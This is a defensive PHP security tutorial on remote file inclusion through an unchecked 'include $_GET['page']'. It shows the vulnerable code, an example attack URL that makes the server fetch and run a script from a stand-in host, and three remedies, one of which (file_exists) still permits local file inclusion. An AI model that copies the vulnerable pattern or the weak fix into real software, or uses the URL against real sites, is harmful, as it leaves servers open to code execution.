PHP Security: GET - include

You often find websites with serious but simple to fix security flaws. In this series we will talk about this. This time about GET - include problems.

In this tutorial we will talk about a very common security flaw.

I will explain how to make a GET -> Include system. In other words, think about an url like: index.php?page=links. The GET variable, in this case "page" will contain the string "links". And after people got this value, they write this kind of line into their page:
Code:

include $_GET['page'].'php';

?>


Or something similar. But in the end, they include the page without checking if it exists or any other safety check.

Much people out there use this, while this is very dangerous for your website. I saw many websites on the web that were hacked because of this system. (or cracked, whatever you want to call it)

Now you want to know why this is dangerous right? Well, it is very dangerous because php can include pages from another server! So php could also include a page from lets say, google.com. And if it will find a php source, it will execute it.

Now don't think everybody can steal your php code, no thats not true. Php can only read other code that's visible for the visitors. Take the following example.

PHP:


Open the source of this website, and you will notice that there is php code you can read.

So lets say, i have a dangerous php script. And i know a website which can read my code? The following url could read it: index.php?page=http://aserver.com/dangerous. (i didnt placed .php behind it, because as you can see in the first php example code, the script pops .php to the end)

My page would be generated by that server, and you can imagine what that could do to a server right?

The remedy!

There are quite a few things that could help destroying this security flaw on your server. I will handle three of them.

First is "allow_url_fopen". This is something you set in your php configuration file. When this is set on, php will be able to read scripts from another server. When it's off, php can only read files from the server it's installed on. This is a nice remedy for the problem, but i do it a bit different. What if you got a script that needs information from another server, and you need to include it? (doesn't happen often, but still keep it in mind)

Second in my list is "file_exists". You will use this in combination with an "if" statement. This will check if the file exists on the local server. It is not able to check if files from another server exists. So this could be quite a good remedy! I will show you an example below:
Code:

// get the name of the file the user wants to read.
$file = $_GET['page'].'.php';

// check if the file exists.
if (file_exists($file)) {

// it exists!
include $file;

} else {

echo'This page doesn\'t exist. Please try again.
';

}

?>


This is already a far better solution in my opinion.

But on this way people can open all the php documents in the folder. You may dislike this, so lets do it again a bit different.

A very simple, but also very effective way is to use an if statement. There is not much to discuss about, so lets see an example:
php

Code:

// check if the page is links?
if ($_GET['page'] == 'links') {

include 'links.php';

// check if the page is aboutMe?
} elseif ($_GET['page'] == 'aboutMe') {

include 'aboutme.php';

// could not find any of the pages?
} else {

echo 'This page doesn\'t exist. Please try again.
';

}

?>


This may not be the most pretty way to solve the problem. But it is very effective, and everyone with basic knowledge of php understands this.